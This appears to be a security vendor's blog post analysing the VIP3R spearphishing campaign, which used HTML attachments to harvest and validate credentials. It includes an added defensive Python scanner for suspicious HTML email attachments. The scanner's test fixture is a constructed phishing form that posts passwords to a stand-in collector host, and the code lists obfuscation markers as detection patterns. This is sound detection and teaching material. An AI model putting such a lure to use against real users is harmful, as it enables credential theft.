New VIP3R Campaign Highlights the Dangers of Spearphishing


Phishing is a security threat faced by almost every organization worldwide. 

From email addresses, user IDs and passwords to bank details and PIN codes, attackers who succeed in stealing highly sensitive data and credentials may go on to steal large sums, commit identity fraud, access company secrets, deploy ransomware and carry out other highly damaging actions.

Geographies, industries, size and stature – when it comes to social engineering attacks, cyber-criminals don’t discriminate. Threat actors recognize that every company has one thing in common: people.

Human error plays a part in almost all cyber-attacks, and phishing is one of the main contributors to that figure. According to a 2021 study from Cisco, at least one individual clicks on a phishing link in 86% of organizations. Additionally, the firm reported that 90% of data breaches can be linked to phishing.

We as humans all have inherent cognitive biases – biases that attackers can manipulate, leading us to perform actions with catastrophic consequences without ever really knowing it.

The likelihood that we might fall victim to such manipulation increases dramatically in the case of spearphishing. While many typical phishing campaigns opt for a ‘spray-and-pray’ approach to reach as many potential victims as possible, spearphishing is a much more targeted methodology that sees highly tailored campaigns deployed against specific organizations or individuals. 

That brings us to VIP3R – a spearphishing campaign recently identified by the team at Menlo Labs. 

VIP3R’s Unique Characteristics

Having encountered a web server hosting compromised usernames and passwords, our analysts were able to confirm that a campaign bearing the unique string “DH4 VIP3R L337” had used 147 unique lures to steal the credentials of 164 users across a range of companies, from financial services organizations to cybersecurity firms.

Digging deeper, we learned that the attack delivered customized HTML attachment payloads to its target victims, which – if opened – would direct them to a phishing page impersonating a service they would commonly use.

The use of an HTML attachment is key: these file types are exempt from the default blocks in most secure email gateways (SEGs) because large financial firms commonly use them to send encrypted emails.

Our analysis of the VIP3R campaign suggests that these HTML attachments are being created automatically by a sophisticated payload generator kit. The Menlo Labs team has not yet been able to verify this, despite having spent significant time looking for the kit. So, for now, we continue to track it as “VIP3R_L33T Generator.”

Upon reaching the impersonated phishing pages, victims would be prompted to submit their credentials, which would then be validated and verified on the server side using the PHPMailer library. As a result, the victim’s username and password would be sent directly to an email address controlled by the attacker.

If this verification failed, an error message would be returned to the user’s browser and the user would then be redirected to the legitimate equivalent of the phishing website. If, on the other hand, the victim’s email and password were verified successfully, the client would be directed to a PDF hosted on Microsoft OneDrive.

As a result, the VIP3R campaign not only bypasses default SEG blocks but also gives attackers an easy and unique way of validating victim credentials.
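The attachment behaviour described above (an HTML file that renders a login form, posts the credentials to a server under the attacker's control, and then redirects) leaves generic traces that a mail-security team can triage before a user ever opens the file. The following scanner is an added example, not code from Menlo Labs or from the VIP3R campaign: it parses an .eml message with Python's standard library, pulls out HTML attachments, and flags four indicators suggested by the description: a password input, a form whose action points to an external host, JavaScript that decodes or writes page content at load time, and a meta refresh. The sample message, attachment names and hosts (`example.invalid`) are constructed for the example; the indicator names and scoring are the author's own choices, not a published rule set.

```python
"""Triage scanner for HTML email attachments (added example, not Menlo's code).

Flags generic credential-harvesting indicators in HTML attachments of an
.eml message: a password input, a form posting to an external host,
JavaScript that decodes or writes content at runtime, and a meta refresh.
"""
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from typing import Dict, List

# Script calls commonly used to unpack an embedded page at load time.
DECODING_MARKERS = ("unescape(", "atob(", "document.write(", "fromCharCode(", "eval(")


class HtmlIndicatorParser(HTMLParser):
    """Collects the tags the heuristics look at; executes nothing."""

    def __init__(self) -> None:
        super().__init__()
        self.password_inputs = 0
        self.form_actions: List[str] = []
        self.meta_refresh = False
        self.script_chunks: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_chunks.append(data)


def scan_html(html: str) -> List[str]:
    """Return the indicator names found in one HTML document, in a fixed order."""
    p = HtmlIndicatorParser()
    p.feed(html)
    p.close()
    findings = []
    if p.password_inputs:
        findings.append("password-input")
    # A relative action ("/login") posts back to wherever the file is served;
    # an absolute http(s) action ships the form data to another host.
    if any(re.match(r"https?://", a.strip(), re.I) for a in p.form_actions):
        findings.append("external-form-post")
    script = "".join(p.script_chunks)
    if any(m in script for m in DECODING_MARKERS):
        findings.append("decoding-javascript")
    if p.meta_refresh:
        findings.append("meta-refresh")
    return findings


def scan_eml(raw: bytes) -> Dict[str, List[str]]:
    """Map each HTML attachment filename in an .eml to its indicator list."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results: Dict[str, List[str]] = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html"))
        if not is_html:
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # e.g. attached as application/octet-stream
            body = body.decode("utf-8", errors="replace")
        results[name] = scan_html(body)
    return results


def build_sample_eml(html: str, filename: str) -> bytes:
    """Build a constructed test message carrying `html` as an attachment."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Secure document"
    msg.set_content("Please open the attached secure document.")
    msg.add_attachment(html, subtype="html", filename=filename)
    return msg.as_bytes()


# Constructed sample resembling a credential-harvesting lure (not a real VIP3R file).
SAMPLE_PHISH_HTML = """<html><head>
<meta http-equiv="refresh" content="30;url=https://login.example.invalid/">
</head><body>
<form method="post" action="https://collector.example.invalid/verify.php">
  <input type="text" name="email"><input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
<script>document.write(unescape("%3Cp%3ELoading%3C/p%3E"));</script>
</body></html>"""

# Constructed benign attachment for contrast.
BENIGN_HTML = "<html><body><h1>Quarterly report</h1><p>Nothing to sign in to.</p></body></html>"

if __name__ == "__main__":
    for name, doc in (("secure_doc.html", SAMPLE_PHISH_HTML), ("report.html", BENIGN_HTML)):
        print(scan_eml(build_sample_eml(doc, name)))
```

Treat the output as a triage signal rather than a verdict: the legitimate encrypted-mail HTML attachments that cause SEGs to exempt this file type also contain forms and decoding script, so a team would tune the indicators against its own traffic (for example, allow-listing the form hosts of its encrypted-mail provider) and route hits to sandboxing or browser isolation rather than blocking outright.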

Protecting Against Increasingly Sophisticated Threats

Analyzing our own customer base, we see phishing continuing to be one of the primary attack methods plaguing firms today. 

Indeed, 22% of all threats faced by our customers are credential phishing attacks. Further, 7% of these evade legacy URL reputation engines by deploying evasive tactics we’ve dubbed LURE.

LURE leverages one of the four evasive techniques found in Highly Evasive Adaptive Threats (HEAT), the use of which has increased significantly in recent times across a variety of campaigns, up 224% in H2 2021. In reviewing well over 500,000 malicious URLs, for example, we found that 69% of them used HEAT tactics.

To combat the threat of phishing effectively, firms must first focus on enhancing awareness among their employees through regular and thorough training and education initiatives. To prevent HEAT attacks at large, however, firms will need to transform their security, pivoting to Zero Trust principles while adopting the Secure Access Service Edge (SASE) framework.
